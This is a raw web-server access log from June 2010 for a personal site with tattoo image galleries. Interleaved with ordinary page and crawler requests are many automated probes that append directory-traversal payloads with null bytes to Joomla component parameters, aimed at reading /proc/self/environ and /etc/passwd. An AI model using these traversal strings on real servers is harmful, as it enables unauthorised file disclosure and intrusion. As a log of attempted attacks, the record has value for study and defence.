96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
188.72.70.56 - - [06/Jun/2010:23:15:38 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:15:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:15:39 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:15:40 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:15:40 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:15:41 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
96.246.29.77 - - [06/Jun/2010:23:16:01 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:16:01 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:16:01 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:16:01 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:16:01 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:16:01 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:16:01 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:16:02 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:16:02 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:16:02 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:16:02 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
188.72.70.56 - - [06/Jun/2010:23:16:36 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:16:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.13.140 - - [06/Jun/2010:23:17:06 -0500] "GET /logs/access_log.1239062400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
68.109.233.150 - - [06/Jun/2010:23:17:22 -0500] "GET /logs/index.php?option=com_jvehicles&controller=./../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""Mozilla/5.0"
68.109.233.150 - - [06/Jun/2010:23:17:22 -0500] "GET /index.php?option=com_jvehicles&controller=./../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.81.68.114 - - [06/Jun/2010:23:17:29 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.81.68.114 - - [06/Jun/2010:23:17:30 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [06/Jun/2010:23:17:40 -0500] "GET /logs/access_log.1242604800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.188.90.44 - - [06/Jun/2010:23:18:23 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:18:46 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:19:29 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:19:29 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:19:29 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:19:29 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
188.72.70.56 - - [06/Jun/2010:23:19:42 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:19:42 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:19:43 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:20:45 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
216.120.241.232 - - [06/Jun/2010:23:21:17 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:17 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:21 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:22 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:22 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:22 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:22 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:22 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:26 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:26 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:26 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:26 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:28 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:28 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:30 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:21:31 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
188.72.70.56 - - [06/Jun/2010:23:21:47 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
91.190.243.10 - - [06/Jun/2010:23:21:48 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
188.72.70.56 - - [06/Jun/2010:23:21:48 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:21:48 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:21:49 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:21:50 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
91.190.243.10 - - [06/Jun/2010:23:21:54 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
188.72.70.56 - - [06/Jun/2010:23:23:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:23:36 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:23:37 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:23:55 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:23:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:23:57 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:24:24 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.195.228 - - [06/Jun/2010:23:25:36 -0500] "GET /logs/access_log.1201824000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.72.70.56 - - [06/Jun/2010:23:26:10 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:27:25 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:27:36 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:27:44 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.121.77.90 - - [06/Jun/2010:23:27:53 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.77.90 - - [06/Jun/2010:23:27:54 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.77.90 - - [06/Jun/2010:23:27:54 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.81.68.114 - - [06/Jun/2010:23:29:14 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
188.72.70.56 - - [06/Jun/2010:23:29:14 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.81.68.114 - - [06/Jun/2010:23:29:14 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
188.72.70.56 - - [06/Jun/2010:23:29:14 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:29:14 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:29:16 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:29:16 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:29:16 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
93.89.215.70 - - [06/Jun/2010:23:29:31 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
216.120.241.232 - - [06/Jun/2010:23:29:31 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:29:32 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:29:32 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:29:32 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:29:32 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:29:32 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:29:36 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:29:36 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.46.195.242 - - [06/Jun/2010:23:29:36 -0500] "GET /logs/access_log.1210464000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.120.241.232 - - [06/Jun/2010:23:29:47 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.241.232 - - [06/Jun/2010:23:29:47 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
93.89.215.70 - - [06/Jun/2010:23:30:03 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
188.72.70.56 - - [06/Jun/2010:23:30:12 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
